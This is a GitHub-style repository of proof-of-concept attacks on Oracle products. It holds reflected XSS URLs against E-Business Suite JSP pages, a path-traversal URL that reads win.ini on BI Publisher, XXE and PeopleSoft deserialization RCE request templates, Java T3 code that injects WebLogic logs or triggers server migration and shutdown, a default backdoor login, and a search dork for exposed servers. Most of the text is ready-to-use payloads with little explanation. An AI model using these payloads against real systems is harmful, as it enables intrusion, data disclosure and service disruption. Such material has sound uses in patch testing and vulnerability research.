├── Oracle Business Intelligence ├── readme.md ├── CVE-2019-2588 traversal │ └── PoC_URL.txt └── XXE │ └── CVE-2019-2616_PoC.txt ├── README.md ├── CVE-2017-10410 └── README.md ├── CVE-2017-10413 └── README.md ├── CVE-2017-10411 └── README.md ├── CVE-2017-10415 └── README.md ├── CVE-2017-10151 └── README.md ├── CVE-2017-10417 └── README.md ├── CVE-2017-10409 └── README.md ├── CVE-2017-10412 └── README.md ├── CVE-2017-10416 └── README.md ├── Oracle AutoVue 3D Professional Advanced 21.0.1.0.0 ├── PoC.txt └── vuln_code.txt ├── CVE-2017-10148 └── README.md ├── CVE-2017-10414 └── README.md ├── CVE-2017-10366 └── README.md └── CVE-2017-10147 └── README.md /Oracle Business Intelligence/readme.md: -------------------------------------------------------------------------------- 1 | inurl:/xmlpserver/ -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OracleCVE 2 | Vulnerabilities which found in Oracle products 3 | -------------------------------------------------------------------------------- /CVE-2017-10410/README.md: -------------------------------------------------------------------------------- 1 | ``` 2 | http://ebs.example.com:8000/OA_HTML/cskmrelstmts.jsp?nStartingPage=1314482';}// 3 | ``` -------------------------------------------------------------------------------- /CVE-2017-10413/README.md: -------------------------------------------------------------------------------- 1 | ``` 2 | http://ebs.example.com:8000/OA_HTML/csm5Sync.jsp?devtype=13&queryId=13muh1r%3cscript%3ealert(1)%3c%2fscript%3er5z89&log=13 3 | `` -------------------------------------------------------------------------------- /CVE-2017-10411/README.md: -------------------------------------------------------------------------------- 1 | ``` 2 | http://ebs.example.com:8000/OA_HTML/cskmslctcat.jsp?h_CatSelectionCallerPage=1314482%27;}%3C/SCRIPT%3E%3Csvg/onload=alert(1)%3E// 3 | ``` -------------------------------------------------------------------------------- /CVE-2017-10415/README.md: -------------------------------------------------------------------------------- 1 | ``` 2 | http://ebs.example.com:8000/OA_HTML/ibutpqs.jsp?fromSource=13&oldTemplateName=13&opcode=13&TemplateID=1310811'}%3C/SCRIPT%3E%3Csvg/onload=alert(1)%3E//2f105 3 | ``` -------------------------------------------------------------------------------- /Oracle Business Intelligence/CVE-2019-2588 traversal/PoC_URL.txt: -------------------------------------------------------------------------------- 1 | http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 2 | -------------------------------------------------------------------------------- /CVE-2017-10151/README.md: -------------------------------------------------------------------------------- 1 | The backdoor created using this JAVA code 2 | ![alt text](https://pbs.twimg.com/media/DNdwkClXkAM30xz.jpg:large "CVE-2017-10151") 3 | username: OIMINTERNAL 4 | password: %single space character% 5 | 6 | https://docs.oracle.com/cd/E40329_01/admin.1112/e27149/appdefaultusr.htm#OMADM5326 7 | -------------------------------------------------------------------------------- /CVE-2017-10417/README.md: -------------------------------------------------------------------------------- 1 | PoC 1 2 | ``` 3 | http://ebs.example.com:8000/OA_HTML/ieccaleexception.jsp?sAsc=py6zg%22%3ew786z&send=13&action=13&calendarName=13&calendarId=13&orderBy=13&next=13 4 | ``` 5 | 6 | PoC 2 7 | ``` 8 | http://ebs.example.com:8000/OA_HTML/ieccaleexception.jsp?sAsc=13&send=vk660%22%3eufnwz&action=13&calendarName=13&calendarId=13&orderBy=13&next=13 9 | ``` -------------------------------------------------------------------------------- /CVE-2017-10409/README.md: -------------------------------------------------------------------------------- 1 | ``` 2 | http://ebs.example.com:8000/OA_HTML/ibeCZzpEntry.jsp?go=aaa%2520onmouseover%253dalert%25281%2529 aaa&forceReg=t&checkAcct=f&enrolled=t&ref=http%3A%2F%2Febs.example.com%3A8000%2FOA_HTML%2FcsdInstSiteLOV.jsp%3FCriteria%3D13%26Criteria%3D13&jttst0=0_21841%2C21841%2C-1%2C0%2C&jtfm0=&etfm1=&jfn=ZG8440C656F895487CD85873E261712B6BB2883DA0C57D4B7904EBC089796653C3D39162564DF461ADD3F0DB479A8A28E5C6&oas=jzTGKVnESVZI-4sz82rD-g.. 3 | ``` -------------------------------------------------------------------------------- /Oracle Business Intelligence/XXE/CVE-2019-2616_PoC.txt: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 3 | Host: host 4 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 6 | Accept-Language: en-US,en;q=0.5 7 | Accept-Encoding: gzip, deflate 8 | Connection: close 9 | Upgrade-Insecure-Requests: 1 10 | Content-Length: 76 11 | Content-Type: text/xml; charset=UTF-8 12 | 13 | 14 | ``` 15 | -------------------------------------------------------------------------------- /CVE-2017-10412/README.md: -------------------------------------------------------------------------------- 1 | PoC 1 2 | ``` 3 | http://ebs.example.com:8000/OA_HTML/cskmslctplat.jsp?h_PlatSelectionCallerPage=13&accountID=13&findName=13&findDesc=13&findSerialNum=13&findRefNum=13&browseNewStartIndex=13egnhp-->xz8gv&firstRequest=13 4 | ``` 5 | 6 | PoC 2 7 | ``` 8 | http://ebs.example.com:8000/OA_HTML/cskmslctplat.jsp?h_PlatSelectionCallerPage=1352327%22}%3C/SCRIPT%3E%3Csvg/onload=alert(1)%3E//56&accountID=13&findName=13&findDesc=13&findSerialNum=13&findRefNum=13&browseNewStartIndex=13&firstRequest=13 9 | ``` 10 | PoC 3 11 | ``` 12 | http://ebs.example.com:8000/OA_HTML/cskmslctprod.jsp?h_ProdSelectionCallerPage=1356726%22}%3C/SCRIPT%3E%3Csvg/onload=alert(1)%3E//&accountID=13&findName=13&findDesc=13&findSerialNum=13&findRefNum=13&browseNewStartIndex=13&firstRequest=13 13 | ``` -------------------------------------------------------------------------------- /CVE-2017-10416/README.md: -------------------------------------------------------------------------------- 1 | PoC 1 2 | ``` 3 | http://ebs.example.com:8000/OA_HTML/ieccaleassignexception.jsp?sAsc=13&send=13&action=13&calendarName=13&calendarId=13&orderBy=repmc%22%3ezmpbn&next=13 4 | ``` 5 | 6 | PoC 2 7 | ``` 8 | http://ebs.example.com:8000/OA_HTML/ieccaleassignexception.jsp?sAsc=inczy%22%3edz62n&send=13&action=13&calendarName=13&calendarId=13&orderBy=13&next=13 9 | ``` 10 | 11 | PoC 3 12 | ``` 13 | http://ebs.example.com:8000/OA_HTML/ieccaleassignexception.jsp?sAsc=13&send=13&action=13&calendarName=13&calendarId=13&orderBy=repmc%22%3ezmpbn&next=13 14 | ``` 15 | 16 | PoC 4 17 | ``` 18 | http://ebs.example.com:8000/OA_HTML/ieccaleassignexception.jsp?sAsc=inczy%22%3edz62n&send=13&action=13&calendarName=13&calendarId=13&orderBy=13&next=13 19 | ``` -------------------------------------------------------------------------------- /Oracle AutoVue 3D Professional Advanced 21.0.1.0.0/PoC.txt: -------------------------------------------------------------------------------- 1 | POST /soap/servlet/rpcrouter HTTP/1.1 2 | Host: 192.168.138.133:8443 3 | Cache-Control: max-age=0 4 | Content-Type: text/xml; charset=utf-8 5 | Content-Length: 651 6 | 7 | 8 | 9 | 10 | ]> 11 | 15 | 16 | 20 | &xxe; 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /Oracle AutoVue 3D Professional Advanced 21.0.1.0.0/vuln_code.txt: -------------------------------------------------------------------------------- 1 | public void doPost(HttpServletRequest paramHttpServletRequest, HttpServletResponse paramHttpServletResponse) 2 | throws ServletException, IOException 3 | ************** 4 | localSOAPContext1.setProperty(Constants.BAG_HTTPSESSION, localHttpSession); 5 | localSOAPContext1.setProperty(Constants.BAG_HTTPSERVLETREQUEST, paramHttpServletRequest); 6 | localSOAPContext1.setProperty(Constants.BAG_HTTPSERVLETRESPONSE, paramHttpServletResponse); 7 | 8 | DocumentBuilder localDocumentBuilder = XMLParserUtils.getXMLDocBuilder(); 9 | 10 | localEnvelope1 = 11 | ServerHTTPUtils.readEnvelopeFromRequest(localDocumentBuilder, 12 | paramHttpServletRequest.getContentType(), 13 | paramHttpServletRequest.getContentLength(), 14 | paramHttpServletRequest.getInputStream(), 15 | this.editor, 16 | paramHttpServletResponse, 17 | localSOAPContext1); -------------------------------------------------------------------------------- /CVE-2017-10148/README.md: -------------------------------------------------------------------------------- 1 | PoC 2 | ``` 3 | static boolean anon_log_injection(String PS_SERVER_IP,String PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException, PersistentStoreException { 4 | Properties p = new Properties(); 5 | p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory"); 6 | p.put(Context.PROVIDER_URL, "t3://"PS_SERVER_IP+":"+PS_SERVER_PORT); 7 | Context ctx = new InitialContext(p); 8 | Object obj = ctx.lookup("weblogic.common.T3Services"); 9 | Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class); 10 | T3ServicesDef h = (T3ServicesDef) o; 11 | h.log().log("ERPScan_1\n\rERPScan_2"); 12 | h.log().info("ERPScan_3\n\rERPScan_4"); 13 | h.log().error("ERPScan_5\n\rERPScan_6"); 14 | h.log().warning("ERPScan_7\n\rERPScan_8"); 15 | h.log().debug("ERPScan_9\n\rERPScan_10"); 16 | return false; 17 | } 18 | ``` 19 | [Reference] https://erpscan.com/advisories/erpscan-17-042-anonymous-log-injection-in-fscm/ 20 | -------------------------------------------------------------------------------- /CVE-2017-10414/README.md: -------------------------------------------------------------------------------- 1 | PoC 1 2 | ``` 3 | http://ebs.example.com:8000/OA_HTML/ibeCScdAgrmntDetail.jsp?ordFlow=13&queryCnt=13&showPage=13&numberOfLines=13&buttonPressed=13&cartDate=13yfb22%22%3ej00i8&headerAgreementId=13&headerAgreementId_orig=13&soldtoCustAccountId=13&cartId=13&refUrl=13 4 | ``` 5 | 6 | PoC 2 7 | ``` 8 | http://ebs.example.com:8000/OA_HTML/ibeCScdAgrmntDetail.jsp?ordFlow=13&queryCnt=13&showPage=13&numberOfLines=13&buttonPressed=13&cartDate=13&headerAgreementId=13&headerAgreementId_orig=13&soldtoCustAccountId=13&cartId=13sttk1%22%3egjf4h&refUrl=13 9 | ``` 10 | 11 | PoC 3 12 | ``` 13 | http://ebs.example.com:8000/OA_HTML/ibeCScdAgrmntDetail.jsp?ordFlow=13&queryCnt=13&showPage=13&numberOfLines=13&buttonPressed=13&cartDate=13&headerAgreementId=13lb6j2%22%3er9uz6&headerAgreementId_orig=13&soldtoCustAccountId=13&cartId=13&refUrl=13 14 | ``` 15 | 16 | PoC 4 17 | ``` 18 | http://ebs.example.com:8000/OA_HTML/ibeCScdAgrmntDetail.jsp?ordFlow=13&queryCnt=13&showPage=13&numberOfLines=13&buttonPressed=13&cartDate=13&headerAgreementId=13&headerAgreementId_orig=13t1kal%22%3eip0ho&soldtoCustAccountId=13&cartId=13&refUrl=13 19 | ``` 20 | 21 | PoC 5 22 | ``` 23 | http://ebs.example.com:8000/OA_HTML/ibeCScdAgrmntDetail.jsp?ordFlow=13&queryCnt=13g72w9%22%3eqb3m3&showPage=13&numberOfLines=13&buttonPressed=13&cartDate=13&headerAgreementId=13&headerAgreementId_orig=13&soldtoCustAccountId=13&cartId=13&refUrl=13 24 | ``` -------------------------------------------------------------------------------- /CVE-2017-10366/README.md: -------------------------------------------------------------------------------- 1 | The RCE vulnerability present in monitor service of PeopleSoft 8.54, 8.55, 8.56. 2 | ``` 3 | POST /monitor/%SITE_NAME% HTTP/1.1 4 | Host: PeopleSoft:PORT 5 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 7 | Accept-Language: en-US,en;q=0.5 8 | Connection: close 9 | Cookie:a=aa 10 | 11 | §JAVA_SERIAL§ 12 | ``` 13 | %SITE_NAME% - is a PeopleSoft "name" to get it you can use some information disclosure or brute force. 14 | information for automation detection: 15 | 1. If monitor component deployed and you don't know %SITE_NAME% then will get this type of error 16 | ``` 17 |

Site name is not valid. Check your URL syntax and try again.

18 | ``` 19 | 20 | 2. If %SITE_NAME% is true then you will get this message 21 | ``` 22 | PeopleSoft 23 | 24 | Ping Test for Monitor Servlet 25 | 26 | Ping successful. Site %SITE_NAME% is valid. 27 | ``` 28 | 29 | 30 | 3. If monitor don't deployed then you will get this message 31 | ``` 32 | Error 404--Not Found 33 | 34 | From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1: 35 | 36 | 10.4.5 404 Not Found 37 | 38 | The server has not found anything matching the Request-URI. No indication is given of whether the condition is temporary or permanent. 39 | 40 | If the server does not wish to make this information available to the client, the status code 403 (Forbidden) can be used instead. The 410 (Gone) status code SHOULD be used if the server knows, through some internally configurable mechanism, that an old resource is permanently unavailable and has no forwarding address. 41 | ``` 42 | -------------------------------------------------------------------------------- /CVE-2017-10147/README.md: -------------------------------------------------------------------------------- 1 | 2 | Vulnerable code 3 | ``` 4 | @Override 5 | public void migrate(final String serverName, final String sourceMachine, final String destinationMachine, final boolean sourceDown, final boolean destinationDown) throws ServerMigrationException { 6 | ServerMigrationTask task = this.taskMap.get(serverName); 7 | if (task == null) { 8 | task = new ServerMigrationTask(serverName, destinationMachine); 9 | if (MigrationDebugLogger.isDebugEnabled()) { 10 | MigrationDebugLogger.debug(serverName + " New Migration Task " + task); 11 | } 12 | this.taskMap.put(serverName, task); 13 | try { 14 | this.stopServer(sourceDown, task); 15 | this.startServer(destinationDown, task); 16 | } 17 | finally { 18 | this.taskMap.remove(serverName); 19 | } 20 | return; 21 | } 22 | throw new ServerMigrationException("Migration operation in progress", null); 23 | } 24 | ``` 25 | PoC 26 | 27 | ``` 28 | static boolean PoC(String PS_SERVER_IP, Server PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException { 29 | Properties p = new Properties(); 30 | p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory"); 31 | p.put(Context.PROVIDER_URL, "t3://"+PS_SERVER_IP+":"+PS_SERVER_PORT); 32 | Context ctx = new InitialContext(p); 33 | Object obj = ctx.lookup("weblogic/cluster/singleton/ServerMigrationCoordinator"); 34 | Object o = PortableRemoteObject.narrow(obj, ServerMigrationCoordinator.class); 35 | ServerMigrationCoordinator h = (ServerMigrationCoordinator) o; 36 | h.migrate("PIA","а","any_data_or_ip", true, true); 37 | return false; 38 | } 39 | ``` 40 | [Reference]https://erpscan.com/advisories/erpscan-17-041-unauthorized-container-shutdown-servermigrationcoordinator/ 41 | --------------------------------------------------------------------------------